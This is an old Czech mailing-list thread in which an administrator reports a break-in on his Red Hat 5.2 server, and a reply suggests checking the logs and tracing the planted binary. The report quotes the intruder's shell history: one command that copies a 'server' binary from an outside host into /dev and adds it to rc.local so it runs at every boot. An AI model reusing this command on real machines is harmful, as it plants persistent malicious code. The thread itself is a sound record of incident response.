Nabourani Linix-u RedHat 5.2

[Mila Kuchta]

Luboš Mikulec <mikulec na dszo.cz> píše v diskusním
příspěvku:00ce01bfd108$403dd1c0$6464a8c0 na dszo...
> Ahoj !
>
> Nejaky darebak nam naboural nas RedHat 5.2
> V korenovem adresary jsem nasel soubor .bash_history s obsahem :
> ------cut-------
> cd /dev;rcp lp na 128.100.31.115:server .;echo "/dev/server" >>
> /etc/rc.d/rc.local./server
> ------cut-------
> V adresary /dev byl spustitelny soubor 'server' s delkou 222976 byte a na
> konci rc.local prikaz na jeho spusteni.
>
> Tak jsem to zalohoval konfuguraci, nabootoval z diskety, preformatoval
disk
> a nainstaloval Redhat 6.2 cz.
>
> Nemate nekdo podobnosu zkusenost nebo nevite oc se jedna ?
>
> Dik, s pozdravem : Mikulec.

Z toho, co jste tu popsal, neni mozne jakkoliv vycist o co se jedna. Je
zajimave, ze tam nekdo takovy soubor vubec zanecha (ale mozna bylo umyslem
Vas na neco upozornit). Faktem je, ze pokud jste to neudelat vy, nebyl jste
jedinym spravcem toho pocitace :-(. Jedina moznost je prozkoumat logy (jeste
jste si je uz nesmazal) a treba prohnat ten program nejakym symbolickym
debuggerem, nebo alespon odchytnout jaderna volani. To Vam ale samo o sobe
nerekne, ktere dvere byly otevreny. A mozna ze vlezl oknem :-). Cemuz se
nemuzete divit pouzivate-li dele nez dva roky stary system (mrknete k
redhatum, jestli tam nepopisuji Vasi sluzbu). Pokud byste chtel prudit,
muzete napsat spravci serveru 128.100.31.115, ze mu byt cracknut ucet lp.
Teda doufam ze to neni nejaka tiskarna :-)), ale na tu by clovek nemel mit
moznost se nalogovat, samozrejme v pripade ze tam take nemaji nevitaneho
spravce.

S pozdravem

Mila Kuchta